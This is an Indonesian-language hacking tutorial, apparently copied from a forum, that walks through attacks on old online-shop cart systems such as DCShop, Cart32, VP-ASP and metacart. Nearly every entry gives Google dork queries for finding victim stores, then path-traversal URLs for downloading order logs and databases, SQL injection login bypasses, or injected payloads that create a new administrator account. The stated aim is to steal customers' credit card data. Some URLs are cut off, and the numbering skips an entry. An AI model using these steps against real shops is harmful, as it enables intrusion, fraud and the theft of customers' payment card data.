1. contoh bugs pada bentuk toko sistem shopadmin : contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti : Ketik google.com :--> allinurl:/shopadmin.asp Contoh target : www.xxxxxx.com/shopadmin.asp Kelemahan sistem ini bila penjahat memasukan kode injection seperti : user : 'or'1 pass : 'or'1
2. contoh bugs pada bentuk toko sistem : Index CGI contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti : google.com : Ketik --> allinurl:/store/index.cgi/page= Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi? ... t_blue.htm Hapus short_blue.htm dan ganti dengan --> ../admin/files/order.log Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/ order.log
3. contoh bugs pada bentuk toko sistem : metacart contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti : google.com allinurl:/metacart/ Contoh target : www.xxxxxx.com/metacart/about.asp Hapus moreinfo.asp dan ganti dengan --> /database/metacart.mdb Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb
4. contoh bugs pada bentuk toko sistem CShop contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti : google.com : Ketik --> allinurl:/DCShop/ Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx Hapus /DCShop/xxxx dan ganti dengan --> /DCShop/orders/orders.txt atau /DCShop/Orders/orders.txt Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt
5. contoh bugs pada bentuk toko sistem : PDshopro contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti : google.com : Ketik --> allinurl:/shop/category.asp/catid= Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx Hapus /shop/category.asp/catid=xxxxx dang ganti dengan --> /admin/ dbsetup.asp Hasilnya : www.xxxxxx.com/admin/dbsetup.asp Dari keterangan diatas , kita dapati file databasenya dgn nama sdatapdshoppro.mdb Download file sdatapdshoppro.mdb dengan merubah url nya menjadi www.xxxxxx.com/data/pdshoppro.mdb Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
6. contoh bugs pada bentuk toko sistem : commerceSQL contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti : google : Ketik --> allinurl:/commercesql/ Contoh : www.xxxxx.com/commercesql/xxxxx Hapus commercesql/xxxxx dan ganti dengan -->cgi-bin/commercesql/index.cgi?page= Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page= Untuk melihat admin config -->www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl Untuk melihat admin manager -->www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi Untuk melihat file log/CCnya -->www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order...
7. contoh bugs pada bentuk toko sistem : EShop contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti : google: Ketik --> allinurl:/eshop/ Contoh : www.xxxxx.com/xxxxx/eshop Hapus /eshop dan ganti dengan --> /cg-bin/eshop/database/order.mdb Hasilnya : www.xxxxxx.com/.../cg-bin/eshop/database/order.mdb Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces (karena untuk membaca database access.mdb sebaiknya pake ms access aja)
8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti : google.com: Ketik --> allinurl:/cart32.exe/ Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound Ganti NoItemFound dengan --> error Bila kita mendapati page error dg keterangan instalasi dibawahnya, berarti kita sukses! Sekarang, kita menuju pada keterangan di bawahnya, geser halaman kebawah, dan cari bagian Page Setup and Directory Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32 berarti di site tsb. terdapat file berisi data cc Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program text editor lainnya. Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/ Nah.., paste satu per satu, file .c32 ke akhir url yg sudah dimodifikasi tadi, dengan format http://www.xxxxx.com/cart32/ Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bi ... 001065.c32
9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0 teknik/jalan ke dua google.com Ketik --> allinurl:/vpasp/shopdisplayproducts.asp Buka url target dan tambahkan string berikut di akhir bagian shopdisplayproducts.asp Contoh : http://xxxxxxx.com/vpasp/shopdisplaypro ... 9;%20union%..., fldpassword%20from%20tbluser%20where%20fldusername= 'admin'%20and%20fldpassword%20like%20'a%25'-- Gantilah nilai dari string url terakhir dg: %20'a%25'-- %20'b%25'-- %20'c%25'-- Kalau berhasil, kita akan mendapatkan informasi username dan password admin Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp silahkan Cari sendiri data CCnya
10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0 contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti : google.com : Ketik --> allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut satu per satu pada bagian search engine : Keyword=&category=5); insert into tbluser (fldusername) values ('')--&SubCategory=&hide=&action.x=46&action.y=6 Keyword=&category=5); update tbluser set fldpassword='' where fldusername=''--&SubCategory=All&action.x=33&action.y=6 Keyword=&category=3); update tbluser set fldaccess='1' where fldusername=''--&SubCategory=All&action.x=33&action.y=6 Jangan lupa untuk mengganti dan nya terserah kamu. Untuk mengganti password admin, masukkan keyword berikut : Keyword=&category=5); update tbluser set fldpassword='' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
11. contoh bugs pada bentuk toko sistem : Lobby.asp contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti : google.com Ketik --> allinurl: Lobby.asp Contoh : www.xxxxx.com/mall/lobby.asp Hapus tulisan mall/lobby.asp dan ganti dengan --> fpdb/shop.mdb Hasilnya : www.xxxxx.com/fpdb/shop.mdb
13. contoh bugs pada bentuk toko sistem roddetail.asp contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti : Ketik --> allinurl:proddetail.asp?prod= Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan --> fpdb/ vsproducts.mdb Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb
14. contoh bugs pada bentuk toko sistem igishop contoh toko akan muncul di search engine bila mengetikan beberapa keyword, seperti : google Ketik --> inurl:"/cart.php?m=" Contoh : http://xxxxxxx.com/store/cart.php?m=view. Hapus tulisan cart.php?m=view dan ganti dengan -->admin Hasilnya http://xxxxxx.com/store/admin Trus masukin username sama pass nya pake statment SQL injection
Usename : 'or"=" Password : 'or"="
sumber : http://tecon-crew.org/forum/viewtopic.php?f=25&t=32
CShop
roddetail.asp
